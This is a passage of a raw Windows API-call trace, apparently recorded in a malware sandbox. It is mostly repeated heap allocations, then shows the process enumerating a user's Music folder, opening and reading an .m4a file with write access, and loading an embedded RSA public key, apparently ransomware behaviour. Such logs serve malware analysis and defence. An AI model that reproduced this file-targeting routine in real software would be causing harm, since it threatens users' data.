dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.082] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.082] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.082] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.082] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.082] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.082] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.082] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.083] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.083] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.083] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.083] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.083] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0201.083] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.084] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0201.084] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.084] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.084] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0201.084] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.085] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.085] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.085] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0201.085] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.085] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.085] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.085] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.086] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.086] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.086] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.086] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.086] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.087] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.087] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.087] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.087] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.088] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.088] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.088] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.088] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.088] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.088] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.088] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.089] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.089] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.089] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.089] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.089] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.090] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.090] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.090] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.090] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.090] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.090] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.090] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.090] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0201.091] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.091] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0201.091] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.091] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.091] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.092] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.092] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0201.092] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.093] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0201.093] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.093] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.094] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.094] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.095] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.095] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0201.095] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.095] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0201.096] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.096] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.096] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0201.096] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.097] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.097] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.097] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0201.097] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.097] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.097] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.097] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.098] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.098] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.098] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.098] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.098] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.098] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.098] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.099] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.099] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.099] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.099] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.099] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.099] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.100] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.103] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.103] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.103] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.103] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.103] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.103] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.104] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.104] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.104] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.104] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.105] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.105] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.105] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.105] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.105] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0201.105] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.106] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0201.106] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.106] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.106] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.106] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.107] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.107] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.107] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0201.107] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.107] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.107] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.107] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0201.108] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.108] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.108] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.108] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.109] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.109] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.109] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.109] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.109] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.110] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.110] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.110] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.110] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0201.110] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.111] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0201.111] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.111] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.111] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0201.112] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.112] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.112] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.112] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.113] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.113] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.113] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.113] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.113] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.114] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.114] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.114] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.114] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.114] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.114] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.114] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.115] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.115] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.115] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.116] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.116] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.116] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\mXrqWFqcp\\_fBV4xgh8cLcTD- y4\\") returned="_fBV4xgh8cLcTD- y4\\" [0201.116] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0201.116] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa80 [0201.116] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.116] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\mXrqWFqcp\\") returned="mXrqWFqcp\\" [0201.116] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8fc00 [0201.117] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0201.117] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\") returned="Music\\" [0201.117] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0201.117] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8fc00 | out: hHeap=0x620000) returned 1 [0201.117] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0201.117] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0201.118] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0201.118] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0201.118] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0201.118] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.118] PathFindFileNameW (pszPath="") returned="" [0201.118] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.118] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\mXrqWFqcp\\_fBV4xgh8cLcTD- y4\\*" (normalized: "c:\\users\\keecfmwgj\\music\\mxrqwfqcp\\_fbv4xgh8clctd- y4\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa72f75c0, ftCreationTime.dwHighDateTime=0x1d89f38, ftLastAccessTime.dwLowDateTime=0xd5a9abf0, ftLastAccessTime.dwHighDateTime=0x1d8a064, ftLastWriteTime.dwLowDateTime=0xd5a9abf0, ftLastWriteTime.dwHighDateTime=0x1d8a064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0201.121] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.121] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa72f75c0, ftCreationTime.dwHighDateTime=0x1d89f38, ftLastAccessTime.dwLowDateTime=0xd5a9abf0, ftLastAccessTime.dwHighDateTime=0x1d8a064, ftLastWriteTime.dwLowDateTime=0xd5a9abf0, ftLastWriteTime.dwHighDateTime=0x1d8a064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0201.121] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x996155c0, ftCreationTime.dwHighDateTime=0x1d89da4, ftLastAccessTime.dwLowDateTime=0xc6b15bd0, ftLastAccessTime.dwHighDateTime=0x1d89f28, ftLastWriteTime.dwLowDateTime=0xc6b15bd0, ftLastWriteTime.dwHighDateTime=0x1d89f28, nFileSizeHigh=0x0, nFileSizeLow=0x322e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-AHHgkVlxn_KxD.m4a", cAlternateFileName="-AHHGK~1.M4A")) returned 1 [0201.121] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.121] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa6) returned 0x2c6ead8 [0201.121] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.121] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\mXrqWFqcp\\_fBV4xgh8cLcTD- y4\\-AHHgkVlxn_KxD.m4a") returned=".m4a" [0201.122] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\mXrqWFqcp\\_fBV4xgh8cLcTD- y4\\-AHHgkVlxn_KxD.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\mxrqwfqcp\\_fbv4xgh8clctd- y4\\-ahhgkvlxn_kxd.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0201.123] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=12846) returned 1 [0201.123] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0201.125] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x3208, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0201.125] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0201.127] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0201.127] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0201.128] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0201.128] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x322e, lpOverlapped=0x0) returned 1 [0201.137] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0201.137] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0201.137] lstrlenA (lpString="-----BEGIN PUBLIC 